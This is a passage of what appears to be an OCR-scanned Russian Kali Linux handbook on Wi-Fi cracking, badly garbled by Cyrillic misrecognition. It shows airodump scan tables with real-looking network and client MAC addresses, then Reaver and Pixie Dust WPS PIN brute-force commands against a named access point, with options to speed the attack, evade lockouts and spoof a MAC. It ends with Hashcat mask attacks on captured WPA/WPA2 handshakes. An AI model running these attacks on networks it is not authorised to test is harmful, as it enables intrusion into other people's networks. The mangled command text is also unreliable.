54е 

іа/РА 

ССМР 

Р5К 



РАМІЕНЕ 

00:26:24:89:20:30 

-70 370 

1 

0 5 

54е 

1а/РА2 

ТКІР 

Р5К 



Иизага 

4С:72:В9:РЕ:В8:ѲС 

-74 329 

10 

0 4 

54е 

Іа/РА 

ССМР 

Р5К 

1.0 

РІЗР.РВС 

Кі«ѵ 

В8:АЗ:86:Е2:14:Е2 

-82 106 

22 

0 6 

54е 

іа/РА2 

ССМР 

РЗК 

1.0 

І_АВ,РВС 

орепЬох 

Р8:1А:67:Р0:73:7А 

-87 55 

0 

0 6 

54е. 

МРА2 

ССМР 

РЗК 

Ьоскесі 

ЗапрЬѳп 

00:21:27:Е0:С9:СЕ 

-87 69 

0 

0 6 

54 . 

МРА2 

ССМР 

РЗК 



РС БАУЕРМ 

70:73:СВ:В7:49:Ю 

-88 59 

8 

0 11 

54е. 

МРА2 

ССМР 

РЗК 



НаіІзЬат 

00 :С0 :СА :67:61 :РА 

-88 45 

0 

0 9 

54е. 

ОРИ 





РегГѳсІ ріасе 3 

64:66:ВЗ:АЕ:8С:Е7 

-89 109 

1 

0 3 

54е. 

«РА2 

ССМР 

РЗК 

ЬоскесІ 

ЗапрИеп 1 

60:Е7:01:74:РО:В4 

-89 64 

0 

0 2 

54е 

МРА2 

ССМР 

РЗК 



ѲОИМЗ 

68:72:51:10 :0С:СА 

-89 24 

0 

0 7 

54е. 

ОРИ 





Ар 4499 # 51: 

В0:В2:ОС :52:3В:68 

-90 4 

0 

0 10 

54е 

«РА2 

ССМР 

РЗК 

1.0 


ргіуа 

ВЗЗЮ 

5ТАТІ0М 

Ріа/В 

Вате 

Ьозі: Ргашез 

РгоЬе 



(по! аззосіаіесі) 

28:СС:Ѳ1 :РС:39:47 

-84 

0 - 1 


26 

119 

ЗС ѴіТЛа 



(пот аззосіаіесі) 

54:88 :ѲЕ :12:42:2Р 

-89 

0 - 1 


0 

1 





20:25:64:16:58:8С 

20:02:АР:32:О2:61 

-38 

Ѳе- 0о 

0 

13 





20:25:64:16:58:8С 

60:РЕ:1Е:33:0Р:02 

-57 

Ѳе- 1 


0 

89 





0С:54:А5:С0:24:О6 

74:Е2:Р5:ВА:ВС:ВС 

-1 

1е- 0 


0 

1 





00:26:24:89:20 :ЗС 

А4:9А:58:23:АС:93 

-1 

1е- 0 


0 

2 





00:26:24:89:20:ЗС 

00: 16 Ю4 :С5 :Ѳ2 :ВЭ 

-1 

48ѳ- 0 


0 

2 





4С:72:В9:РЕ:В8:0С 

48:5А:ЗР:08:15:69 

-1 

54ѳ- 0 


0 

2 





4С:72:В9:РЕ:В8:ѲС 

38:2О:О1:В5:Р0:06 

-1 

54е- 0 


0 

4 





В8:АЗ:86:Е2:14:Е2 

С8:ЗА:35:Р9:1В:81 

-1 

24ѳ- 0 


0 

16 





ВѲ:В2 ЮС :52:3В: 68 

РѲ ЮР :9А :СВ :ЕС :9С 

-89 

0 - 1 


0 

5 

ргіуа 




Например, из этого списка меня заинтересовал ТД КіМу, её В55Ю — 4С:72:В9:РЕ:В8:0С. 

Вся необходима информация для запуска Кеаѵег'а у меня есть. Останавливаем 
аігосІитр-п§ и запускаем Ривер: 


1 


геаѵег -і ѵѵІапОтоп -Ь 4С:72:В9:РЕ:В8:0С 
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Канал и 55Ю (при условии, что 55Ю не замаскирована) целевой ТД будет автоматически 
идентифицирована Кеаѵег'ом, если они не заданы явным образом в командной строке: 


1 


геаѵег -і ѵѵІапОтоп -Ь 4С:72:В9:РЕ:В8:0С -с 4 -е КіТТу 


По умолчанию, если ТД переключает каналы, Кеаѵег также будет соответственно 
переключать каналы. Тем не менее, эту функцию можно отключить, зафиксировав 
канал интерфейса: 


1 


геаѵег -і ѵѵІапОтоп -Ь 4С:72:В9:РЕ:В8:0С — ТіхесІ 


Таймаут по умолчанию равен 5 секундам. Если нужно, этот период таймаута можно 
задать вручную (минимальный период таймаута — 1 секунда): 


1 


геаѵег -і ѵѵІапОтоп -Ь 4С:72:В9:РЕ:В8:0С -1: 2 


Дефолтный период между попытками пина — 1 секунда. Эта величина может быть 
увеличена или уменьшена до любого не отрицательного целого числа. Величина ноль 
означает без задержки: 


1 


геаѵег -і ѵѵІапОтоп -Ь 4С:72:В9:РЕ:В8:0С -с) О 


Некоторые ТД временно блокирует их ѴѴР5 состояние, обычно на 5 минут или меньше, 
когда выявлена «подозрительная» активность. По умолчанию, когда выявлен 
заблокированное состояние, Кеаѵег будет проверять состояние каждый 315 секунд (5 
минут и 15 секунд) и не будет продолжать брут-форсить, пока \Л/Р5 состояние не 
разблокируется. Эта проверка может быть увеличена или уменьшена до любой не 
отрицательной целой величины: 


1 


геаѵег -і ѵѵІапОтоп -Ь 4С:72:В9:РЕ:В8:0С --Іоск-сІеІау=250 


Для дополнительного вывода, можно задать уровень подробности. Если опцию 
подробности написать дважды, то это увеличит количество выдаваемой информации и 
будет отображать каждую попытку пина: 


1 


геаѵег -і ѵѵІапОтоп -Ь 4С:72:В9:РЕ:В8:0С -ѵѵ 


Дефолтный период получения сообщений ответа М5 и М7 \Л/Р5 — 0.1 секунды. Если 
нужно, этот период таймаута может быть задан автоматически (максимальный период 
таймаута — 1 секунда): 


1 


геаѵег -і ѵѵІапОтоп -Ь 4С:72:В9:РЕ:В8:0С -Т .5 


Некоторые убогие реализации \Л/Р5 разрывают соединение, если введён неверный 
пин, вместо того, чтобы отвечать сообщением ІМАСК, как этого требует спецификация. В 
расчёте на это, если достигнут таймаут М5/М7, это лечится также установлением ІМАСК 
по умолчанию. Тем не менее, если известно, что целевая ТД отправляет ІМАСК'и 
(большинство делают), эта функция может быть отключена для улучшения 
совместимости. Обычно эта опция не используется, поскольку Веаѵег автоматически 
определяет, отправляет ли ТД надлежащие ответы с ІМАСК'и или нет: 


1 


геаѵег -і ѵѵІапОтоп -Ь 4С:72:В9:РЕ:В8:0С -паск 


Хотя большинство ТД не заботятся об отправки им сообщения ЕАР РАН для закрытия 
сессии \Л/Р5, иногда это необходимо. По умолчанию, эта функция отключена, но она 
может быть задействована для тех ТД, которым это нужно: 


1| 

геаѵег -і ѵѵІапОтоп -Ь 4С:72:В9:РЕ:В8:0С -еар-іегтіпаіе 
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Когда случаются 10 последовательных неожиданных ошибок \Л/Р5, будет отображено 
сообщение предупреждения. Поскольку это может быть знаком того, что ТД 
ограничивает скорость попыток пина или просто перегружена, то на этот случай может 
быть задан период сна, который программа будет бездействовать при появлении этого 
сообщения предупреждения: 


1 


геаѵег -і ѵѵІапОтоп -Ь 4С:72:В9:РЕ:В8:0С --І'аіІ-ѵѵаі^ЗбО 


Ускоряем атаку 

По умолчанию, Кеаѵег имеет задержку в 1 секунду между попытками пина. Вы можете 
отключить эту задержку добавив «-б 0» к командной строке, но некоторые ТД не любят 
этого: 


1 


геаѵег -і ѵѵІапОтоп -Ь 4С:72:В9:РЕ:В8:0С -б 0 


Другая опция, которая может ускорить атаку, это -сіб-зтаіі. Эта опция инструктирует 
Кеаѵег использовать маленькие секретные номера Диффи-Хеллмана, чтобы уменьшить 
вычислительную нагрузку на целевую ТД: 


1 


геаѵег -і ѵѵІапОтоп -Ь 4С:72:В9:РЕ:В8:0С — сІИ-зтаІІ 


Кеаѵег, атака Ріхіеѵѵрз и ключ -К 1 

Не так давно открытая атака Ріхіеѵѵрз позволяет взламывать некоторые модели 
роутеров за считанные секунды. Модификация форка Кеаѵег — Ібх — для 
использования атаки Ріхіе Оизі включена в Каіі Ыпих. При этом она заменяет 
оригинальную версию. Т.е. запускать её нужно точно также, как и устаревший Кеаѵег. 
Единственным её отличием является поддержка атаки Ріхіеѵѵрз и нескольких новых 
ключей. Одним из этих ключей является -К 1. Если задать этот ключ, то Кеаѵег 
попытается осуществить в отношении выбранной ТД атаку Ріхіеѵѵрз. Т.е. теперь 
команда будет выглядеть так: 


1 


геаѵег -і ѵѵІапОтоп -Ь 4С:72:В9:РЕ:В8:0С -К 1 


Э 


той модификации посвящена следующая глава «Модификация форка Кеаѵег — Ібх — 
для использования атаки Ріхіе Оизі». 

Ту статью стоит прочитать хотя бы по следующим причинам: 

• там дан перевод всей справки Кеаѵег по всем ключам; 

• там рассказано о трёх новых ключах: -К // — ріхіе-бизі в геаѵег; -И // — ріхіебизі- 
Іо§ в геаѵег; -Р // — ріхіесІизЫоор в геаѵег 
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Подмена МАС 

В некоторых случаях вам может хотеть/нужно подменить ваш МАС адрес. Кеаѵег 
поддерживает подмену МАС мадрес с опцией -тас, но вам нужно убедиться, что МАС 
адрес корректно подменён, т. к. есть нюансы. 


Изменение МАС адреса виртуального интерфейса режима монитора (теперь 
называемого ѵѵІапОтоп) НЕ БУДЕТ РАБОТАТЬ. Вы должны изменить МАС адрес 
физического интерфейса вашей беспроводной карты. Например: 


1| 

# іТсопТі§ ѵѵІапО сіоѵѵп 

21 

# іТсопТі§ ѵѵІапО Гіѵѵ еТИег 04:0Е:А0:ВЕ:ЕР:45 

3| 

# іГсопГі§ ѵѵІапО ир 

4| 

# аігтоп-п§ зТагТ ѵѵІапО 

51 

# геаѵег -і ѵѵІапОтоп -Ь 4С:72:В9:РЕ:В8:0С -ѵѵ -тас=04:0Е:А0:ВЕ:ЕР:45 


Глава 21. Модификация форка Кеаѵег — ібх — для 
использования атаки Ріхіе Ри$1 


И /Неп роог девідп тееів роог ітріетепіаііоп. 

Когда убогий дизайн встречается с убогой реализацией. 

(это не про форки Кеаѵег, это про \А/Р5) 

Обновление: Пользователям Каіі Ипих не нужно ставить эти программы вручную. 
Теперь всё это есть в системе "из коробки". Подробности читайте здесь . 

Если у вас какие-либо проблемы с беспроводными устройствами, то следует 
ознакомиться с Главой 19. Лучшие совместимые с Каіі Ипих 1 15В ѴѴі-Рі адаптеры 

Что такое Кеаѵег 

Кеаѵег предназначен для подборки пина \Л/Р5 (ѴѴіЯ РгоТесТесІ Зеіир) методом 
перебора. Кеаѵег создан для надёжной и практичной атаки на ѴѴР5, он прошёл 
тестирование на большом количестве точек доступа с разными реализациями ѴѴР5. В 
среднем, Кеаѵег раскрывает пароль ѴѴРА/ѴѴРА2 в виде простого текста целевой точки 
доступа (ТД) за 4-10 часов, в зависимости от ТД. На практике, ему обычно нужна 
половина этого времени на предположение пина \Л/Р5 и разгадки пароля. 

Веб-сайт оригинальной версии — ННр$://сосІе.йооЕІе.сот/р/геаѵег-ѵѵр5/ . Там ещё есть 
Рго версия. 

Форки Кеаѵег 

Т.к. оригинальная версия Кеаѵег не обновлялась с января 2012 года, то был сделан 
форк. Сайт форка — ИНр5://сосІе.йС>ОйІе.сот/р/геаѵег-ѵѵр5-1 : огк/ . Последние изменения 
в форке датируются январём 2014 года. 

Жизнь не стоит на месте. И совсем недавно (в апреле 2015 года) была официально 
выпущена модифицированная версия форка Кеаѵег. Сайт этой модификации — 
ЬНр5://йі1:ЬиЬ.сотАбх/геаѵег-\л/р5-1 : огк-1:6х . Главное её отличие в том, что она может 
использовать атаку Ріхіе Оизі для нахождения верного пина \Л/Р5. Эта атака применима 
ко многим точкам доступа Каііпк, Вгоаскот и КеаІІек. 
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Атака, используемая для этой версии, разработана ѴѴііге. 

Для установки модифицированной версии Кеаѵег, нам нужно установить Ріхіеѵѵрз. Это 
нужно сделать всем, кроме пользователей Каіі Ыпих: расслабьтесь, ребята, у нас уже 
всё есть. 


Установка Ріхіеѵѵрз на Каіі Ыпих 


Всё необходимые пакеты уже скопилированы и доступны в репозиториях. Для их 
установки достаточно набрать: 


1 


арІ-§е1: ІіЬрсар-сІеѵ ріхіеѵѵрз 


Установка Ріхіеѵѵрз на ОеЬіап, Міпі, Шэипіи 


Ставим зависимости Ріхіеѵѵрз: 


1 


зисіо ар1-§е1: іпзТаІІ ІіЬззІ-сіеѵ 


Переходим на официальный сайт . 

Скачиваем гір-архив — для этого нажимаем кнопку йоѵѵпіоасі 1\Р. 


1| 

сс) йоѵѵпіоасіз 

2 1 

ипіір ріхіеѵѵрз-тазіег.гір 

3| 

сс) ріхіеѵѵрз-тазіег/згс 

4| 

таке 

5 1 

§сс -з1:с)=с99 -о ріхіеѵѵрз ріхіеѵѵрз.с гапсІот_г.с -ІззІ -Ісгуріо 

6| 

таке іпзіаіі 


Вывод после последней команды: 


1| 

іпзіаіі -й ріхіеѵѵрз /изг/ІосаІ/Ьіп/ріхіеѵѵрз 

2 1 

іпзіаіі -т 755 ріхіеѵѵрз /изг/ІосаІ/Ьіп 


Установка модификации форка Кеаѵег — Ібх на Каіі Ыпих 

Ещё раз повторю, у пользователей Каіі Ыпих эта версия, а также все зависимости для 
этой программы идут "из коробки". Им не нужно ничего дополнительно устанавливать. 


Установка модификации форка Кеаѵег — ібх на ОеЬіап, Міпі, УЬипіи 


Установка необходимых библиотек и инструментов 


Библиотеки для Веаѵег: 


1 


арТ-§е1: -у іпзТаІІ ЬиіІсІ-еззепбаІ ІіЬрсар-сІеѵ зцІйеЗ ІіЬздІіТеЗ-сІеѵ аігсгаск-п§ ріхіеѵѵрз 


Если пакет Ріхіеѵѵрз Ьу ѴѴііге не найден, то вернитесь к предыдущему шагу, где описано 
как его установить. 
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Компиляция и установка Кеаѵег 


Загрузка: 


1 


§І1 сіопе М:1:р5://§і1:ЬиЬ.сот/і:бх/геаѵег-ѵѵр5-1 : огк-1:бх 


Или так: 


1 


\л/§еТ ШрзУ/ёііЬиЬ.сотДбх/геаѵег-ѵѵрз-Іюгк-Ібх/агсЫѵе/тазІег.іір && итір тазіег.іір 


Сборка: 


1| 

ссі геаѵег-ѵѵрзДогк-Ібх*/ 

21 

ССІ 5ГС/ 

3| 

,/сопб§иге 

4| 

таке 


Установка: 


1 


зіісіо таке іп5І:а II 


Использование Кеаѵег 

Использованию Кеаѵег будет посвящена отдельная статья, а пока только несколько 
основных моментов. 


Запускается модифицированная версия Кеаѵег точно также, как и форк. Чтобы 
убедиться, что модификация у вас успешно запустилась, наберите в командной строке: 


1| 

геаѵег-ѵ 

21 

Кеаѵег ѵі.4 ѴѴІРІ Ргоіесіес) Беіир АШаск ТооІ 

3| 

Соругі§Ы: (с) 2011, ТасбсаІ Меілл/огк Боіибопз, Сгаі§ НеДпег <сбеДпег(а)і;аспе1:50І.сот> 


Кроме версии, появится также и информация о модификации: 

Обязательные аргументы: 


1| 

-і, —іпТегТасе=<ѵѵІа п> 

Имя сетевого интерфейса для использования 

2 1 

-Ь, --Ь55ІсІ=<тас> 

В55Ю точки доступа 


Опциональные аргументы: 


1| 

-т, --тас=<тас> 

МАС хостовой системы 

2 1 

-е, — е55ІСІ=<55ІСІ> 

Е55Ю целевой ТД 

3| 

-с, --сНаппеІ=<сІіаппеІ> 

Установить канал 802.11 для интерфейса 
(подразумевает -Р) 

4| 

-о, ~оиЫ11е=<Л1е> 

Установить вывод в лог-файл [зЫоЩ] 

5 1 

-5, -5е55іоп=<КІе> 

Восстановить файл предыдущей сессии 

6| 

-С, --ехес=<соттапсі> 

Выполнить данную команду после успешного 
подбора пина 

71 

-Р, -сіаетопііе 

Перевод геаѵег в режим демона 

81 

Ш 

ей 

с 

г+ 

О 

Автоматически определить лучшие продвинутые 
опции для целевой ТД 
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91 

-Р, — ТіхесІ 

Отключить прыгание по каналам 

101 

-5, -5§іі2 

Использовать каналы 50Нг 802.11 

111 

-ѵ, --ѵегЬозе 

Отображать некритические предупреждения (-ѵѵ 
чтобы увидеть больше) 

121 

-ц, — риіеі: 

Отображать только критические предупреждения 

131 

-К -ріхіе-сіи5І:=<номер> 

[1] Запускает ріхіеѵѵрз с РКЕ, РКВ, Е-НазЫ, Е-НазІі2, 
Е-[\1опсе и Аиібкеу (Ваііпк, Вгоасісот, ВеаІІек) 

141 

-2, --по-аиіо-разз 

НЕ запускать геаѵег для автоматического 
получения пароля ѴѴРА, если атака ріхіеѵѵрз 
прошла успешно 

151 

-Іі, —Иеір 

Показать справку 


Продвинутые опции: 


1| 

-р, — ріП=<ѴѴр5 рІП> 

Использовать заданный 4 или 8 цифровой ѴѴР5 пин 

2 1 

-б, --сіеІау=<секунды> 

Установить задержку между попытками пина [1] 

3| 

-1, ~Іоск-сІеІау=<5есопсІ5> 

Установить время ожидания, если ТД 

заблокировала попытки вода пина [60] 

4| 

-§, --тах-а1:1:етр1:5=<номер> 

Выйти после числа попыток пина 

5 1 

-х, --РаіІ-\л/аі1:=<секунды> 

Установить время для паузы после 10 
неожиданных неудач [0] 

6| 

-г, —гесиггіп§-с)еІау=<х:у> 

Делать паузу на у секунд каждые х попыток пина 

71 

-1, -1ітеои1:=<секунды> 

Установить пиреод таймаута получения [5] 

81 

-Т, --т57-1ітеои1:=<секунды> 

Установить период таймаута М5/М7 [0.20] 

91 

-А, --по-аззосіаіе 

Не связываться с ТД (связь должна быть сделана 
другим приложением) 

10| 

-И, -по-паскз 

Не отправлять сообщения ИАСК когда получены 
пакеты о неисправности 

111 

-5, —сІЬ-зтаІІ 

Использовать малые РН ключи для ускорения 
скорости взлома 

121 

-І_, ~і§поге-Іоскз 

Игнорировать заблокированные состояния, 

полученные от целевой ТД 

131 

-Е, --еарИегттаРе 

Завершать каждую сессию ѴѴР5 пакетом ЕАР РАН 

141 

-п, --паск 

Целевая ТД всегда шлёт пакеты МАСК [Аиіо] 

151 

-ѵѵ, -ѵѵіп7 

Мимикрировать под ѴѴІпсІоѵѵз 7 ге§І5Ігаг [Раізе] 

16 

-X, --ехбаизіііѵе 

Установить исчерпывающий режим с начала сессии 
[Раізе] 

171 

-1, —рі-іпсіех 

Установить начальный индекс массива для первой 
половины пина [Раізе] 

181 

-2, —р2-іпсІех 

Установить начальный индекс массива для второй 
половины пина [Раізе] 

191 

-Р, --ріхіесІизЫоор 

Установка в режим Ріхіеіюор (не отправляет М4 и 
делает петлю на М3) [Раізе] 
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20 1 

-ѴѴ, -§епега1:е-ріп 

Генерация дефолтных пинов от команды сІеѵНузО 
[1] Веікіп [2] й-Ыпк 

21 1 

-Н, -ріхіесІи5Ыо§ 

Включить логирование последовательностей 

завершённых РіхіеНазГіез 


Пример использования: 


1 


геаѵег -і топО -Ь 00:АА:ВВ: 11:22:33 -ѵѵ -К 1 


Опция -К // — ріхіе-сіизі в геаѵег 

Опция -К 1 запускает ріхіеѵѵрз с РКЕ, РКК, Е-НазЫ, Е-На5Н2, Е-І\Іопсе и АиіНкеу. ріхіеѵѵрз 
будет пытаться атаковать Каііпк, Вгоаскот и КеаІІек. 

*Особая заметка: если вы атакуете ТД КеаІІек, НЕ используйте маленькие ключи ОН (-5) 

Опция -Н // — ріхіегіи5І-Іо§ в геаѵег 


Опция -Н — это переключатель включения логирования РіхіеНазНез, сохранённые хеши 
будут размещены в директории запуска. Эта опция требует включения хотя бы -ѵѵѵ, и, 
соответственно, работает с -К 1 & -Р. 

Имена сохранённых файлов соответствуют ЬззісІ (МАС) цели и имеют расширение .ріхіе. 
Внутри этих сохранённых логов вы найдёте все требуемые хеши РіхіеОизІ:, а также 
готовые для копипасты полные команды для использованиях их в программе ріхіеѵѵрз. 
Также есть возможность выполнить их. Просто закиньте этот файл в ваш любимый 
шелл и выполните его (может понадобиться сНтосІ +х <имя_файла>). 

Оция -Р // — ріхіесіизЫоор в геаѵег 

Опция (-Р) в геаѵег переводит геаѵег в циклический режим, который не 
распространяется на сообщения М4 протокола ѴѴР5, которые, надеемся, избегают 
блокировки. Это распространяется ТОЛЬКО на сборы РіхіеНазЬ, который используются с 
ріхіеѵѵрз, НЕ с «онлайн» брутфорсингом пинов. 


Эта опция была сделана в целях: 

• Сбора повторяющихся хешей для дальнейших сравнений и анализов / изучения 
новых уязвимостей чипсетов, роутеров и т.д. 


• Атак чувствительных ко времени, где сбор хешей продолжается постоянно пока 
ваши временные рамки не закончатся. 


• Для целей скриптинга тех, кто хочет использовать возможный способ 
предотвращения блокировки РіхіеНазЬ, ведущей сбор для вашего 
пользовательского сценария. 


Использование \Л/а$Н 


ѴѴазЬ ѵі.5.2 ѴѴіРі Ргоіесіесі 5е1ир 5сап ТооІ 

Соругі§Ні: (с) 2011, Тасіісаі ІМеІѵѵогк Зоіиііопз, Сгаі§ НеДпег <сИеДпег@і:аспе1:50І.сот> 
тосі Ьу 1б_х <1б_х@Ио1:таіІ.сот> & ОаІаНеасІ & 5охгок2212 

Обязательные аргументы: 


1| 

-і, — іпТегТасе=<И : асе> 

Интерфейс для захвата пакетов 

21 

-Г, -Гііе [РИЕ1 РИЕ2 РИЕЗ ...] 

Читать пакеты из захваченных файлов 
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Опциональные аргументы: 


1| 

-с, --сІтаппеІ=<пит> 

Канал для прослушивания [аіііо] 

21 

-о, —оиТ-ТМе=<ТМе> 

Записать данные в файл 

3| 

-п, --ргоЬе5=<пит> 

Максимальное количество попыток отправки к 
каждоый ТД в режиме сканирования [15] 

4| 

-й, -сіаетопііе 

Демонизация ѵѵазИ 

51 

-С, --і§поге-Гс5 

Игнорировать ошибки проверки целостности фреймов 

6| 

-5, —5§Нг 

Использовать каналы 5СНг 802.11 

71 

-5, --5СЭП 

Использовать режим сканирования 

81 

-и, — зигѵеу 

Использовать режим опроса [беГаиИ] 

91 

-Р, --ГіІе-оЩрЩ-ріресІ 

Позволяет стандартному выводу ѴѴэбГі передаваться 
другим программам. Пример, ѵѵазіі х|у|і... 

101 

-§, --§е1-сЫр5е1: 

Передача вывода и запуск геаѵег для определения 

чипсета 

111 

-К, — Гіеір 

Показать справку 


Пример: 


1 


\л/а5Іі -і топО 


Опция -§ // — §еІ-сИір$еІ 

Опция -§ программы ѵѵазН автоматически запускает геаѵег для получения данных 
чипсета. 


Если ТД не отвечает ему быстро, эта опция будет замедленна для отображения данных, 
т. к. геаѵег будет запущен пока не получит данные или пока вы не достигните лимита 
таймаута (30 секунд). 


Глава 22. Взлом паролей ѴѴРА2/ѴѴРА с помощью НазНсаі в КаМ 
Ыпих (атака перебором ѴѴі-Рі паролей по маске) 

Если у вас какие-либо проблемы с беспроводными устройствами, то следует 
ознакомиться с Главой 19. Лучшие совместимые с КаІІ ііпих ІІ5В \А/і-Рі адаптеры 

Недавно просматривал темы на форуме Античат. При беглом осмотре самой живой 
мне показалась одна тема — тема о взломе ѴѴі-Рі сетей. Причём довольно часто там 
попадаются сообщения с просьбами сгенерировать пароли по маске. Кто-то это делает, 
потом запрашивающий выкачивает эту базу. Базы могут быть и в 20 Гб... Впоследствии 
эта сгенерированная база паролей используется для перебора (взлома). 

По моему мнению, это очень точный пример мартышкиного труда, вызванного 
незнанием довольно простых вещей, давным-давно реализованных (и не только в 
НазИсаТ). Для ликвидации этого пробела в знаниях и предназначена эта статья. За 
основу взята статья с сайта Блэкмора. Но она: 1) дополнена; 2) исправлена (судя по 
всему, Блэкмор не смог осилить пользовательские наборы символов — я в своей статье 
этот пробел устраняю). Лучше него никто не может растянуть на семь листов то, что 
можно описать в нескольких строчках команд.)) 
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Ах да, если вам всё-таки нужно сгененировать пароли по маске, то это может сделать 
команда тазкргосеззог. 

НазИсаІ; (сисІаНазбсаІ: или осі НазИсаТ) на Каіі Ыпих дают возможность расшифровать 
(взломать) пароль ѴѴРА2 ѴѴРА. НазГісаІ атакует файлы рукопожатий — .сар файлы. Есть 
только одно ограничение — нужно конвертировать файл .сар в файл формата .Гіссар. 
Но это не трудно. 

На$Иса1: 

НазбсаГ, как скромно замечают сами авторы, это самый быстрый инструмент по 
восстановлению паролей, использующий графический процессор. Программа 
бесплатна, хотя она содержит проприетарную кодовую базу. Доступны версии для 
Ыпих, 05Х и ѴѴіпсІоѵѵз, есть варианты для использования центрального 
вычислительного процессора и для использования графического процессора. НазИсаІ; в 
настоящее время поддерживает огромное количество алгоритмов хеширования, 
включая МісгозоД ІМ НазГіез, ІѴЮ4, ІѴЮ5, семейство 5НА, форматы ІІпіх СгурТ, Му5Щ, 
Сізсо РІХ и многие другие (их там сотни). 

НазГісаІ популярна, т. к. много раз попадала с сводки новостей благодаря оптимизации 
и недостаткам в алгоритмах, которые были открыты её создателем, а затем 
эксплуатировались в дальнейших выпусках ГіазГісаГ (например, недостаток в схеме 
хеширования ІРаззѵѵогсІ). 

Типы атак НазИсаІ 

НазГісаІ предлагает множество моделей атак для получения эффективного и 
комплексного покрытия пространства хешей. Есть следующий режимы: 

• Атака брут-форсом (перебором) 

• Комбинаторная атака 

• Атака по словарю 

• Атака по отпечаткам 

• Гибридная атака 

• Атака по маске 

• Перестановочная атака 

• Атака основанная на правиле 

• Табличная атака 

• Атака с переключением раскладки 

Традиционную атаку перебором можно считать устаревшей, и команда разработчиков 
НазГісаІ рекомендует атаку по маске в качестве полного заменителя. 

Варианты НазНсаІ 

НазГісаІ поставляется в двух вариантах: 

• НазГісаІ - Инструмент по восстановлению использующий центральный 
процессор 

• осІНазбсаГ - Инструмент использующий графический процессор 
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Многие алгоритмы, поддерживаемые НазЬсаТ, могут быть взломаны в более короткое 
время, при использовании хорошо документированных возможностей СРІІ. Для этого 
и предназначена программа осІНазбсаІ:, при её использовании достигается 
значительный прирост в таких алгоритмах как ІѴЮ5, 5НА1 и других. Тем не менее, не 
все алгоритмы могут быть ускорены использованием СРП ВегурТ — хороший этому 
пример. Из-за таких факторов как ветвление зависимостей данных, сериализация и 
память (упомянуты только некоторые), осІНазбсаІ; не является всеобъемлющей 
заменой для Назбсаі;. 

НазИсаТ доступна для Ыпих, 05Х и ѴѴіпсІоѵѵз. осІНазИсаІ; доступна для Ыпих и ѴѴіпсІоѵѵз 
из-за неправильной реализации ОрепСІ. на 05Х. 


Мои настройки 

На машине с Каіі Ыпих 1.1.0а у меня графическая карта Кабеоп НО 7870М Зегіез, и я 
буду использовать словарь госкуои в большинстве упражнений. В этой заметке я 
покажу пошаговый взлом паролей \Л/РА2 ѴѴРА с НазИсаІ (файлов рукопожатий — .сар- 
файлов) с помощью сигіаНазНсаІ или осІНазГісаІ или НазНсаІ на Каіі Ыпих. 

Я буду использовать команду осІНазЬсаІ:, т. к. я использую АІѴЮ СРІІ. Если вы 
используете ІМѴЮІА СРІІ, то для вас сисІабазЬсаІ:. 

Для включения взлома видеокартой, вам нужно установить или СІЮА для видеокарты 
ІМѴЮІА или 1§1гх для АІѴЮ. Как это сделать было рассказано в предыдущих постах. 

Пользователи ІМѴЮІА: 

• Установите драйвер ІМѴЮІА на Каіі Ыпих - ІМѴЮІА ускоренный графический 

драйвер Ыпих 

• Установите модуль ядра драйвера ІМѴЮІА СІЮА и Ругіі: на Каіі Ыпих - СІЮА, Ругіі: 
и Сругіі-сисіа 

Пользователи АІѴЮ: 

• Установите проприетарный ійігх драйвер АМР АТІ ійігх на Каіі Ыпих 

• Установите АМР АРР 5РК в Каіі Ыпих 

• Установите СА1.++ в Каіі Ыпих 

• Установите Ругіі: 


Зачем использовать НазНсаі для взлома файлов рукопожатий ѴѴРА ѴѴРА2 

Ругіі; самый быстрый, когда нам нужно взломать файлы рукопожатий ѴѴРА2 ѴѴРА. Так 
почему мы используем Назітсаі: для взлома файлов рукопожатий ѴѴРА2 ѴѴРА? 

Потому что мы можем? 

Потому что Назбсаі: позволяет нам настроить атаку с заданными правилами и 
масками. Чтобы было понятнее, что имеется ввиду, рассмотрим конкретные примеры. 

Назбсаі: позволяет нам использовать следующие встроенные наборы символов для 
атаки на файл рукопожатия ѴѴРА2 ѴѴРА. 
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Встроенные наборы символов 


1| 

?І = аЬссІе^ІіукІтпорцгзіиѵѵѵхуі 

21 

?и = АВСОЕР6НиКІММОРЦК5ТиѴѴѴХѴ2 

3| 

?СІ = 0123456789 

4| 

?5= !"#$%&'()*+,-./:;«?@[\] Л _'{|Г 

51 

?а = ?І?и?сі?5 

6| 

X 

о 

о 

о 

X 

о 

II 

-О 

о- 


Цифровые пароли 

Допустим, ваш пароль 12345678. Вы можете использовать пользовательскую МАСКУ 
вроде такой ?сі?сі?сі?сі?сі?сі?сі?сі 

Это означает, что мы пробуем сломать пароль из восьми цифр вроде 12345678 или 
23456789 или 01567891. Уверен, вы уловили смысл. 

Буквенный пароль — все заглавные буквы 

Если ваш пароль набран капсом, вроде АВСРЕРСН или І.КНЛ-ІІОР или 2ВТСѴРКЭ5 и т. д., 
тогда вы можете использовать следующую МАСКУ: 

?и?и?и?и?и?и?и?и 

Она будет взламывать все пароли из восьми заглавных букв. 

Буквенный пароль — все строчные буквы 

Если ваш пароль набран строчными буквами, вроде: абссіеі^іт или сИ§Ироіи или 
Ьптіоріу и т. д., тогда вы можете использовать следующую МАСКУ: 

?І?І?І?І?І?І?І?І 

Она будет взламывать все пароли из восьми строчных букв. Думаю, и это тоже 
понятно. 

Пароль — буквы нижнего регистра и цифры 

Если вы знаете, что пароль наподобие а1Ь2сЗсІ4 или р9о8і7и6 или п4і2к5І6 и т. д. 
(буквы и цифры чередуются), тогда вы можете использовать следующую МАСКУ: 

?І?СІ?І?СІ?І?СІ?І?СІ 

Пароль — заглавные буквы и цифры 

Если вы знаете, что пароль вроде такого А1В2С304 или Р908І71І6 или Ы4.І2К51.6 и т. д. 
(буквы и цифры чередуются), тогда вы можете использовать следующую МАСКУ: 

?и?сІ?и?сІ?и?сІ?и?б 

Пароли — смесь из заглавных, строчных букв, цифр и специальных 
символов 

Если ваш пароль исключительно случайный, тогда вы можете просто использовать 
МАСКУ вроде этой: 
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?а?а?а?а?а?а?а?а 

Обратите внимание: ?а символизирует что угодно... Надеюсь, идея понятна. 

Чем меньше известно о пароле, тем дольше срок его подбора. Использование атаки по 
словарю может значительно увеличить шанс успеха. 

Пароль — когда вы знаете некоторые символы 

Если вы каким-то образом знаете несколько символов в пароле, то дела будут 
двигаться намного быстрее. Каждая известная буква сохранит огромное количество 
компьютерного времени. МАСКИ можно использовать совместно. Давайте 
предположим, что нам нужно подобрать пароль из восьми символов, который 
начинается с аЬс, не содержит каких-либо специальных символов. Тогда вы можете 
создать МАСКИ вроде таких: 

